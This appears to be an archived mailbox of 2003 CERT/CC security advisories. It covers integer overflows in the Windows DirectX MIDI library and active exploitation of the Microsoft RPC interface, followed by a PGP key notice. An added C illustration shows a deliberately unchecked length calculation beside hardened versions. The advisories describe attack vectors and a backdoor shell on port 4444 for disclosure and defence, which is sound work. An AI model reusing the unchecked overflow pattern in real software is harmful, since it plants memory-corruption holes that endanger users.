A set of integer overflows exists in a DirectX library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or to cause a denial of service.

I. Description

Microsoft Windows operating systems include multimedia technologies called DirectX and DirectShow. From Microsoft Security Bulletin MS03-030, "DirectX consists of a set of low-level Application Programming Interfaces (APIs) that are used by Windows programs for multimedia support. Within DirectX, the DirectShow technology performs client-side audio and video sourcing, manipulation, and rendering."

DirectShow support for MIDI files is implemented in a library called quartz.dll. This library contains two vulnerabilities:

    VU#561284 - Microsoft Windows DirectX MIDI library does not adequately validate Text or Copyright parameters in MIDI files

    VU#265232 - Microsoft Windows DirectX MIDI library does not adequately validate MThd track values in MIDI files

In both cases, a specially crafted MIDI file could cause an integer overflow, leading to incorrect memory allocation and heap corruption. Any application that uses DirectX/DirectShow to process MIDI files may be affected by this vulnerability.
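The bug class shared by CA-2003-10 (length handling in xdrmem_getbytes()) and CA-2003-18 (Text/Copyright lengths and MThd track values): a length read from untrusted input feeds arithmetic that wraps before the allocation. The following is an added, constructed illustration, not code from the XDR library or from quartz.dll; the chunk layout (32-bit big-endian length followed by payload) and all function names are assumptions, and the unchecked variant only computes the wrapped size, it never allocates or copies.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Constructed example (not the XDR or quartz.dll code): a length-prefixed
 * chunk, as in a MIDI meta event or an XDR opaque, is a 32-bit big-endian
 * length followed by that many bytes. The parser must bound the length by
 * the bytes actually present and by the arithmetic it is about to do.
 */

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * Vulnerable arithmetic, shown in isolation: reserving room for a NUL
 * terminator in 32-bit arithmetic wraps when len is 0xFFFFFFFF, so the
 * allocation request becomes 0 while a later copy would still trust len.
 * This function deliberately does nothing but the arithmetic.
 */
uint32_t unchecked_text_alloc_size(uint32_t len)
{
    return len + 1;   /* wraps to 0 for len == UINT32_MAX */
}

/*
 * Hardened version: len is rejected when it exceeds the data remaining in
 * the buffer or when len + 1 cannot be represented. Returns 0 and a
 * NUL-terminated heap copy on success, -1 on any inconsistency.
 */
int parse_text_chunk(const uint8_t *buf, size_t buflen, char **out)
{
    *out = NULL;
    if (buf == NULL || buflen < 4)
        return -1;                 /* no room for the length field itself */
    uint32_t len = be32(buf);
    if (len > buflen - 4)
        return -1;                 /* claims more payload than is present */
    if (len == UINT32_MAX)
        return -1;                 /* len + 1 would wrap in 32 bits */
    char *s = malloc((size_t)len + 1);
    if (s == NULL)
        return -1;
    memcpy(s, buf + 4, len);
    s[len] = '\0';
    *out = s;
    return 0;
}

/*
 * Element-count shape ("track count times record size"): refuse the
 * multiplication when the product does not fit in 32 bits instead of
 * letting it wrap to a small allocation. Returns 0 on success, -1 on overflow.
 */
int checked_mul32(uint32_t count, uint32_t elem_size, uint32_t *total)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return -1;
    *total = count * elem_size;
    return 0;
}

int main(void)
{
    /* constructed chunk: length 5, payload "Hello" */
    static const uint8_t good[] = {0, 0, 0, 5, 'H', 'e', 'l', 'l', 'o'};
    /* constructed chunk: length 0xFFFFFFFF with only three payload bytes */
    static const uint8_t bad[] = {0xff, 0xff, 0xff, 0xff, 'a', 'b', 'c'};
    char *text = NULL;
    uint32_t n = 0;

    printf("unchecked size for len 0xFFFFFFFF: %u\n",
           unchecked_text_alloc_size(UINT32_MAX));
    if (parse_text_chunk(good, sizeof good, &text) == 0) {
        printf("good chunk parsed: \"%s\"\n", text);
        free(text);
    }
    printf("bad chunk rejected: %s\n",
           parse_text_chunk(bad, sizeof bad, &text) == -1 ? "yes" : "no");
    printf("0x40000001 * 4 fits in 32 bits: %s\n",
           checked_mul32(0x40000001u, 4u, &n) == 0 ? "yes" : "no");
    return 0;
}
```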
Of particular concern, Internet Explorer (IE) uses the Windows Media Player ActiveX control and quartz.dll to handle MIDI files embedded in HTML documents. An attacker could therefore exploit this vulnerability by convincing a victim to view an HTML document, such as a web page or an HTML email message, that contains an embedded MIDI file. Note that in addition to IE, a number of applications, including Outlook, Outlook Express, Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser ActiveX control to interpret HTML documents.

Further technical details are available in eEye Digital Security advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers to these vulnerabilities as CAN-2003-0346.

II. Impact

By convincing a victim to access a specially crafted MIDI or HTML file, an attacker could execute arbitrary code with the privileges of the victim. The attacker could also cause a denial of service in any application that uses the vulnerable functions in quartz.dll.

III. Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-030.

Disable embedded MIDI files

Change the Run ActiveX controls and plug-ins security setting to Disable in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses the WebBrowser ActiveX control to render HTML. This modification will prevent MIDI files from being automatically loaded from HTML documents. This workaround is not a complete solution and will not prevent attacks that attempt to load MIDI files directly.

Instructions for modifying IE security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.
Microsoft

Please see Microsoft Security Bulletin MS03-030.

Appendix B. References

* CERT/CC Vulnerability Note VU#561284 - http://www.kb.cert.org/vuls/id/561284
* CERT/CC Vulnerability Note VU#265232 - http://www.kb.cert.org/vuls/id/265232
* eEye Digital Security advisory AD20030723 - http://www.eeye.com/html/Research/Advisories/AD20030723.html
* Microsoft Security Bulletin MS03-030 - http://microsoft.com/technet/security/bulletin/MS03-030.asp
* Microsoft Knowledge Base article 819696 - http://support.microsoft.com/default.aspx?scid=kb;en-us;819696
_________________________________________________________________

These vulnerabilities were researched and reported by eEye Digital Security.
_________________________________________________________________

Feedback can be directed to the author, Art Manion.
______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2003-18.html
______________________________________________________________________

Revision History

July 25, 2003: Initial release


From: CERT Advisory
To: cert-advisory@cert.org
Date: Thu, 31 Jul 2003 17:00:16 -0400
Subject: CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface

CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface

Original issue date: July 31, 2003
Last revised: -
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Microsoft Windows NT 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003

Overview

The CERT/CC is receiving reports of widespread scanning and exploitation of two recently discovered vulnerabilities in the Microsoft Remote Procedure Call (RPC) interface.

I. Description

Reports to the CERT/CC indicate that intruders are actively scanning for and exploiting a vulnerability in Microsoft's DCOM RPC interface as described in VU#568148 and CA-2003-16. Multiple exploits for this vulnerability have been publicly released, and there is active development of improved and automated exploit tools for this vulnerability. Known exploits target TCP port 135 and create a privileged backdoor command shell on successfully compromised hosts. Some versions of the exploit use TCP port 4444 for the backdoor, and other versions use a TCP port number specified by the intruder at run-time.
We have also received reports of scanning activity for common backdoor ports such as 4444/TCP. In some cases, due to the RPC service terminating, a compromised system may reboot after the backdoor is accessed by an intruder.

There appears to be a separate denial-of-service vulnerability in Microsoft's RPC interface that is also being targeted. Based on current information, we believe this vulnerability is separate and independent from the RPC vulnerability addressed in MS03-026. The CERT/CC is tracking this additional vulnerability as VU#326746 and is continuing to work to understand the issue and mitigation strategies. Exploit code for this vulnerability has been publicly released and also targets TCP port 135.

In both of the attacks described above, a TCP session to port 135 is used to execute the attack. However, access to TCP ports 139 and 445 may also provide attack vectors and should be considered when applying mitigation strategies.

II. Impact

A remote attacker could exploit these vulnerabilities to execute arbitrary code with Local System privileges or to cause a denial of service condition.

III. Solutions

Apply patches

All users are encouraged to apply the patches referred to in Microsoft Security Bulletin MS03-026 as soon as possible in order to mitigate the vulnerability described in VU#568148. These patches are also available via Microsoft's Windows Update service.

Systems running Windows 2000 may still be vulnerable to at least a denial of service attack via VU#326746 if their DCOM RPC service is available via the network. Therefore, sites are encouraged to use the packet filtering tips below in addition to applying the patches supplied in MS03-026.

Filter network traffic

Sites are encouraged to block network access to the RPC service at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter.
The specific services that should be blocked include

* 135/TCP
* 135/UDP
* 139/TCP
* 139/UDP
* 445/TCP
* 445/UDP

If access cannot be blocked for all external hosts, the CERT/CC recommends limiting access to only those hosts that require it for normal operation. As a general rule, the CERT/CC recommends filtering all types of network traffic that are not required for normal operation.

Because current exploits for VU#568148 create a backdoor, which is in some cases 4444/TCP, blocking inbound TCP sessions to ports on which no legitimate services are provided may limit intruder access to compromised hosts.

Recovering from a system compromise

If you believe a system under your administrative control has been compromised, please follow the steps outlined in

Steps for Recovering from a UNIX or NT System Compromise

Reporting

The CERT/CC is tracking activity related to exploitation of the first vulnerability (VU#568148) as CERT#27479 and the second vulnerability (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent to cert@cert.org with the appropriate CERT# in the subject line.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

Please see Microsoft Security Bulletin MS03-026.

Appendix B.
References

* CERT/CC Vulnerability Note VU#561284 - http://www.kb.cert.org/vuls/id/561284
* CERT/CC Vulnerability Note VU#326746 - http://www.kb.cert.org/vuls/id/326746
* Microsoft Security Bulletin MS03-026 - http://microsoft.com/technet/security/bulletin/MS03-026.asp
* Microsoft Knowledge Base article 823980 - http://support.microsoft.com?kbid=823980
______________________________________________________________________

Authors: Chad Dougherty and Kevin Houle
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-19.html
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis.
Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2003 Carnegie Mellon University.

Revision History

July 31, 2003: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPyl3xGjtSoHZUTs5AQE8gAQAqCNAwHihfJzIH8DJDaWxGqacDZYAzGjh
30rPq9AM1/0KkvsdfHb6MC/b+ktCZBrMvXew1e+WGOoE0McZ+IuB9t2DIGsFCBuo
ltqDw8v08FLM+7zsAM0DooEZLdNpkqdiKhKvooyJ6LGrj5Nb5inW5joITSBn9MMY
YSIQfaGqABU=
=m+s3
-----END PGP SIGNATURE-----

From - Fri Sep 5 14:15:01 2003
X-UIDL: 6184
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path:
Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165])
    by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h85Ka6lo377749;
    Fri, 5 Sep 2003 13:36:06 -0700 (PDT)
Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1])
    by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h85Ka18D032506;
    Fri, 5 Sep 2003 13:36:01 -0700
Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169])
    by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h85KZt0u032318;
    Fri, 5 Sep 2003 13:35:55 -0700
Received: from canaveral.indigo.cert.org (localhost [127.0.0.1])
    by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h85KPjFf021514;
    Fri, 5 Sep 2003 16:31:24 -0400
Received: from localhost (lnchuser@localhost)
    by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h85JA8ip017976;
    Fri, 5 Sep 2003 15:10:08 -0400
Date: Fri, 5 Sep 2003 15:10:08 -0400
Message-Id:
From: CERT Advisory
To:
    cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: New CERT/CC PGP Key
Precedence: list
Status: RO
X-Status:
X-Keywords:
X-UID: 87

-----BEGIN PGP SIGNED MESSAGE-----

New CERT Coordination Center (CERT/CC) PGP Key

The CERT/CC has generated a new PGP key. We use this key to sign all outgoing email, including documents sent to this list. Effective immediately, this new key is available and will be valid until Monday, November 1, 2004.

To obtain further information or to download the new CERT/CC public PGP key, please visit or

A copy of the new key has also been included at the bottom of this message and sent to public PGP key servers.

In accordance with good key management practices, we have also generated a revocation certificate for the existing PGP key. The revocation certificate for PGP key id 0xD9513B39 has also been included below and sent to the public PGP key servers.

If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org.
______________________________________________________________________

This document is available from: or
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message:

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information
http://www.cert.org/legal_stuff.html

Copyright 2002, 2003 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBP1jGmjpmH2w9K/0VAQEsaAP6A5vZh9p3OcpBSXVaFdOki/AYviHcZvmr mw5/xQ8mYsRYCrTRT9c5MVlmRSHKV2Y4AXmnjIygp9wBciBJfMy60B/NT8q3gAWc s2E+gHHvzPtU7Jd52DCJMJukKIf/ht6WnkhyRUfKIdGYUl98+N3jnjESp2qdhJWD qsqjfE9/5tM= =IW8c -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org 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 =G/b3 -----END PGP PUBLIC KEY BLOCK----- From - Mon Sep 8 16:32:31 2003 X-UIDL: 6230 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-s.berkeley.edu (snarl.Berkeley.EDU [128.32.25.165]) by uclink-store.berkeley.edu (8.12.9/8.12.3) with ESMTP id h88KTrlo186643; Mon, 8 Sep 2003 13:29:53 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-s.berkeley.edu (8.12.9/8.12.9) with ESMTP id h88KTm8D022518; Mon, 8 Sep 2003 13:29:48 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.9/8.12.9) with ESMTP id h88KTi0u022387; Mon, 8 Sep 2003 13:29:44 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h88KRgFL014096; Mon, 8 Sep 2003 16:28:00 -0400 Received: from localhost 
    (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h88Iq12Z009947;
    Mon, 8 Sep 2003 14:52:01 -0400
Date: Mon, 8 Sep 2003 14:52:01 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Summary CS-2003-03
Precedence: list
Status: RO
X-Status:
X-Keywords:
X-UID: 88

-----BEGIN PGP SIGNED MESSAGE-----

CERT Summary CS-2003-03

September 8, 2003

